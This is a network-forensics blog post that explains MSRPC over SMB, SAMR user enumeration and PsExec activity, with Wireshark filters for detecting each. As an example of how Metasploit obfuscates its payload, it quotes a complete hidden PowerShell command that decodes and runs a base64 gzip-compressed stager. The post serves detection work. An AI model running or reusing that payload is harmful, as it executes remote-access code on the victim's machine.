DEV Community

Cover image for SMB: metadata in RPC
Petr Stuchlík for NetrixOne

Posted on

2

SMB: metadata in RPC

They call it DCE/RPC, but at the end of the day it's just a huge pile of cleartext metadata on your network.

This is another article in the series on metadata for network forensics. In the previous article I gave some examples of metadata hiding in common SMB file transfers and today I am going to briefly describe Remote Procedure Calls over SMB.

While Samba is mostly known as a file and printer sharing solution, it also provides Named Pipes to facilitate communication between local and remote process.

Now, in Windows networks, Named Pipes are typically used by MSRPC protocol. MSRPC is basicly an implementation of Distributed Computing Environment Remote Procedure Call (DCE/RPC) protocol used to execute functions on the remote endpoint and to transfer data. This allows MSRPC to copy files, work with remote Windows registry and manage Windows services while having the benefit of SMB authentication layer (since a named pipe is just another type of a "share"). Following services are typical examples of MSRPC traffic generators:

  • MS Sharing
  • MS Security (NLMSSP)
  • MS Active Directory
  • MS Print
  • MS Terminal Server
  • MS Remote Services

So e.g. Spoolsvc.exe can generate a packet which looks like this:

+-------------------------------+
|              IP               |
+-------------------------------+
|             TCP               |
+-------------------------------+
|        SMB Named Pipe         |
+-------------------------------+
|        MSRPC (DCE/RPC)        |
+-------------------------------+
|     Print Spooler Service     |
+-------------------------------+

401TRG compiled an excellent resource on this topic and packet samples in the following sections are borrowed from their work.

Domain users enumeration

Security Account Manager (SAMR) protocol uses SMB as one of its transport protocols. In this case, SMB connects to samr pipe on IPC$ share. It can then invoke SAMR methods to enumerate domains (samr.opnum == 6), domain users (samr.opnum == 13), query user info (samr.opnum == 36) etc. Following filter shows packets with user information.

samr user enum packet

Wireshark filter: samr.samr_EnumDomainUsers.sam or samr.samr_QueryUserInfo.info
PCAP sample: smb_net_user.pcap by 401TRG

PsExec

PsExec is a popular Sysinternals Suite tool for remote administration in Active Directory environments and is often an attacker's favorite choice for remote code execution attacks. A deep dive to PsExec is can by found in this blog.

In a basic attack scenario a binary PSEXESVC.exe is transferred over SMB
protocol to a victim machine using ADMIN$ share. It is then executed remotely as a temporary service using IPC$ share. Following filter will match SMB transfers and invocations of PsExec based on filename detection.

Wireshark filter: smb.file ~ "PSEXESVC" or smb2.filename ~ "PSEXESVC" or svcctl.servicename ~ "PSEXESVC"
PCAP sample: smb_psexec_add_user.pcap by 401TRG

It is however worth noting that such a file transfer usually triggers alarms so PsExec modules like Metasploit attempt to evade it using PowerShell invocation via RPC. An example how Metasploit obfuscates its payload:

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIfj8FkCA71WbW/aSBD+nEr9D1aFZFsl2BDaNJEqnW0gEDABHCDAoWhjr+2FtZfY6/DS63+/MdgNVZoq1w9ngbwvM7vPPvPMjt0ktDlhoeB0y8OF3
/YuhG/v3530UIQCQSr4y6ZxnxSFwkOX+BEn8skJzBaCbmt037OGdC18FaSZtlrVWIBIOL+8NJIowiE/9EtXmGtxjIMHSnAsycI
/wtjHET69eVhgmwvfhMJ96YqyB0Qzs62BbB8Lp1ropHMdZqMUXslaUcIl8e+/RXl2Wp6X6o8JorEkWtuY46DkUCrKwnc53fB2u8KSaBI7YjFzeWlMwrNKaRjGyMVdWO0Jm5j7zIlFGc4CvwjzJAqFo1OlyxyMJBGavYjZmuNEOAafUit8YkssFcKE0qLwlzTLMAySkJMAwzzHEVtZOHoiNo5LTRQ6FA+wO5e6eJ0f
/a1O0rETWPV4JBchMq+CNZmTUHzwF+WXcLOYyvAcxRWo+P7+3ft3bq6HhVpF1xN3MDg7FgS0Tmb7Nga8Uo/FZG/9VVCLggl7Is6iLXQLt1GC5bkwS6Mxm8+FAh2onduhXnx9iXJuD9Ye2d7A0GzEiDMHlyxUhU05Cax04nXN1bBLQlzbhiggdi4r6VfcY5fi/WlLuVkXUEliNoGdGqbYQzzlsSjMXrrVA8J
/+OoJoQ6ONBviFwMqCK38M5hDaCSxFZo4AJ4OfRHC4IKYcW6dCXib7572wUg0KIrjotBLIJvsomBhRLFTFLQwJtmUlnC2b4rPcM2EcmKjmOfLzeUfRGYbGiyMeZTYEDs4/K21wjZBNOWiKDSJg
/WtRbx8Y
/GXTBiIUhJ6sNITRAJGUgYsnioiAox59OWShXkrWFEcgNk+tRsUeZDIWSLsVYQ87IgvUOYaPwg6JSRn4ggjRNmijBeFEYk4XBEpuamW/hjC0f1wAGNEOIuJlCfNTN
/yVOSFDZk+erpubrxUohlLe04iDnw0IhboKMafqxaPgC3pg3JDDA2eSSukpq0vSVlbk3LLhP+QnLVY7dxpXy+aSlTb+K7Wiltms1frN5vVp2trVOVWvcXbvRY363eLhaU1B8MJn7a05i1Rl5PqbnVNdlZHcyYb5fNO361VfbNbeI47qbmud+5ag/KnBumMjb6uVlCnVk86Y32tq9W4TtbNPhn2l9cN
/jAZUTR0Fe+ufIHIphMtRmVm7lqaduWf2btrd3Tlm8520lQuxtWlVtc0I6yPGjprT
/RI6ykj5K3Yuu21zcAzNL1hEzztDxt6v9
/QteHV4rF2oXjge4d8fTyqkOnqbuBDvwEQ2opabTl4xyZ9IOmKacgbgI1nVGzfBZvaR03
/2GVxBS11pulg05g+Aq7JqtGjMH87rDBtRLt3SOtMtw1FKU96Va2pkvGVp6VLIk
/vIy1+qu1qSnnkMGf8qTtxldEdPVdqxu3KdhVFWTdrbXta3ny5Oa
/q6qMRkIA+VBzlYvhFD+FkvSfP6Y
/PB5vu9gH2GyrK6EMqHdBOwTfak+sjMbx235soin1EQSRwheeZ2mBRI7uPe4ykHpL0XKeXOAoxhdIGxS+Xu0Yps9P6cHR9Q4U61I05ZO4QmmeVX7Zk4Yeh
/Fw38qHLyykAhjR61nipg0OP+0V1c6aqcP+rm6oK5377UQ222kpHCxbTKnKg7OeN6H4jOc21gpPsIkzuw/+B1CzVfXg5byP1eew3s28iWi1mRLwY
/3ngPxH+ZzSMEeFgbsGNRfGhhP6OjUxNR58eechAKW72pJ+CNwk/7cJXyb
/ONMdWhAoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Wireshark alone won't get you very far here, but sometimes you should be able to spot PowerShell in SMB packets and work from there:

Wireshark filter: smb.file ~ "POWERSHELL" or smb2.filename ~ "POWERSHELL" or svcctl.binarypathname ~ "POWERSHELL"
PCAP sample: smb_metasploit_psexec_pth_download_meterpreter.pcap by 401TRG


As you can see, RPC can be used to call remote functions, which can also mean starting a remote service, which in turn can do almost anything you want. Next time I am going to dig some bits in the SMB traffic which can provide useful in endpoint fingerprinting.

References

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more

Top comments (0)

A Workflow Copilot. Tailored to You.

Pieces.app image

Our desktop app, with its intelligent copilot, streamlines coding by generating snippets, extracting code from screenshots, and accelerating problem-solving.

Read the docs

👋 Kindness is contagious

Explore a sea of insights with this enlightening post, highly esteemed within the nurturing DEV Community. Coders of all stripes are invited to participate and contribute to our shared knowledge.

Expressing gratitude with a simple "thank you" can make a big impact. Leave your thanks in the comments!

On DEV, exchanging ideas smooths our way and strengthens our community bonds. Found this useful? A quick note of thanks to the author can mean a lot.

Okay